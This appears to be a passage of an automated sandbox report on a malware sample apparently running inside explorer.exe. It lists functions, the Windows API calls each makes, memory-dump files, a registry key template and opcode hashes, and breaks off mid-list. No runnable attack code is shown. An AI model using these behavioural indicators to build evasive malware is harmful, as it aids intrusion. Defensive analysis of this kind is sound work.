                                                                                                            • RegGetValueW.KERNEL32 ref: 00E046E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 4005939669-2357458413
                                                                                                            • Opcode ID: 2115ce6193abd41777d6ffd69be575b92e3f0452e2be5c5e42853abc2101455d
                                                                                                            • Instruction ID: b85647f6aa86d97d3abf9d8a5759a493f8550b2c28a4bc3a01784044b9b1da15
                                                                                                            • Opcode Fuzzy Hash: 2115ce6193abd41777d6ffd69be575b92e3f0452e2be5c5e42853abc2101455d
                                                                                                            • Instruction Fuzzy Hash: 82011972218BC1C6E760DB64F44478AB3A4F795344F905622E6CC63BA8DF7DC545CB40
                                                                                                            Function 00E04AF4 Relevance: 4.6, APIs: 3, Instructions: 90synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32 ref: 00E04880
                                                                                                              • Part of subcall function 00E04DA0: SHGetKnownFolderPath.SHELL32 ref: 00E04E23
                                                                                                            • LocalFree.KERNELBASE ref: 00E04BF3
                                                                                                              • Part of subcall function 00E04710: RegOpenKeyW.ADVAPI32 ref: 00E0474E
                                                                                                            • LocalFree.KERNEL32 ref: 00E04C72
                                                                                                            • WaitForSingleObject.KERNEL32 ref: 00E04CC6
                                                                                                            • LocalFree.KERNEL32 ref: 00E04D45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$FolderKnownObjectOpenPathSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 423962919-0
                                                                                                            • Opcode ID: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                                                            • Instruction ID: 6bee453cbd22a4007d06eabe55a3573cf27e03afad864b99689ef28204476576
                                                                                                            • Opcode Fuzzy Hash: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                                                            • Instruction Fuzzy Hash: F65107B6206B80C1FB24CF04F4D53A9A3A0F7E4748F51152AD64EAA7E4DBBDC585CB90
                                                                                                            Function 00E32CBC Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _errno.LIBCMT ref: 00E32CDF
                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00E3064F,?,?,00000000,00E2AC17,?,?,00000000,00E2AC73,?,?,?,00E29403), ref: 00E32D13
                                                                                                            • _callnewh.LIBCMT ref: 00E32D2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap_callnewh_errno
                                                                                                            • String ID:
                                                                                                            • API String ID: 849339952-0
                                                                                                            • Opcode ID: 4b04040313b4c59d8f4c6c08effb20606fd586f7079442bb8a48b4545a6d528d
                                                                                                            • Instruction ID: da1b85de809cc0a54026140d52fa850f4451e01cd9735568d819036755600c14
                                                                                                            • Opcode Fuzzy Hash: 4b04040313b4c59d8f4c6c08effb20606fd586f7079442bb8a48b4545a6d528d
                                                                                                            • Instruction Fuzzy Hash: 6E01B13170128085EF154B21EA48369AAA1ABA4BE8F58B6388F957B694EB3C8481C741
                                                                                                            Function 00E26893 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            Function 00E2681A Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            Function 00E26BA4 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            Function 00E26487 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            Function 00E2F5AC Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CreateInformationVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 3563531100-0
                                                                                                            • Opcode ID: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                                                            • Instruction ID: 05319fdb2dc70cf08a3ac943464081b68462692762f9014ded866839c0eabb10
                                                                                                            • Opcode Fuzzy Hash: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                                                            • Instruction Fuzzy Hash: D6E0DFB4611BD083FB845B14F849B5A2620FB9A785F902834F90A33764DF3CC98ACB04
                                                                                                            Function 00E12160 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00E1218F
                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 00E121E0
                                                                                                              • Part of subcall function 00E1DAD0: CryptAcquireContextW.ADVAPI32 ref: 00E1DB1E
                                                                                                              • Part of subcall function 00E1DAD0: CryptCreateHash.ADVAPI32 ref: 00E1DB47
                                                                                                              • Part of subcall function 00E1DAD0: WaitForSingleObject.KERNEL32 ref: 00E1DBB5
                                                                                                              • Part of subcall function 00E1DAD0: CryptReleaseContext.ADVAPI32 ref: 00E1DCA2
                                                                                                              • Part of subcall function 00E1DAD0: CryptDestroyHash.ADVAPI32 ref: 00E1DCB5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2609862481-0
                                                                                                            • Opcode ID: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                                                            • Instruction ID: ab274cbd0b5a372966ca42d5018040e5c39ec2c3df16e8ad32089a4326fe493d
                                                                                                            • Opcode Fuzzy Hash: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                                                            • Instruction Fuzzy Hash: E8119232228AC082E760CB60F88879F73A1F784744F90512AE789C7E58DB3EC588CB04
                                                                                                            Function 00E1C360 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 181713994-0
                                                                                                            • Opcode ID: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                                                            • Instruction ID: 261a4b0ff16a1922f9f278e028530080628fddd5452111a611802556c5203987
                                                                                                            • Opcode Fuzzy Hash: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                                                            • Instruction Fuzzy Hash: 5A015E7218C280C7D634DB98E0443EEB360F385348F306226F696E3A26CB7DC8E58B41
                                                                                                            Function 00E17AF0 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 181713994-0
                                                                                                            • Opcode ID: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                                                            • Instruction ID: 78ed5438bf42996953bbe5d658d2f3d3598839f847c88a36d19fb113b0bdfb86
                                                                                                            • Opcode Fuzzy Hash: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                                                            • Instruction Fuzzy Hash: 6501403550C680CBD730AB58E014AEAB3B2F785B58F502626F7C662B58CB7DC5D48F41
                                                                                                            Function 00E044B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                                                            • Instruction ID: 34bea136e24079cd9ca2882cd827f2b56cc0ba5e4fc8844b509a27c98fb91980
                                                                                                            • Opcode Fuzzy Hash: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                                                            • Instruction Fuzzy Hash: 1B0162F4214641D3F7109B24FE157A316A0E3A4348F602835D61AF62E0FB7DCAC98380
                                                                                                            Function 00E19929 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00E1998F
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E199EE
                                                                                                            • LoadLibraryExW.KERNEL32 ref: 00E19A38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3311809864-0
                                                                                                            • Opcode ID: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                                                            • Instruction ID: 91b5966f19b29a6cff71d9499aab62128c2e1852896f1c0060de646b3f01a6f2
                                                                                                            • Opcode Fuzzy Hash: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                                                            • Instruction Fuzzy Hash: 0401A276B18BC589DB30CB04E4A07AAB360F7C6744F805816D68E53A68DB3CD589CF42
                                                                                                            Function 00E18CE3 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00E18D4C
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E18DAE
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E18DF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
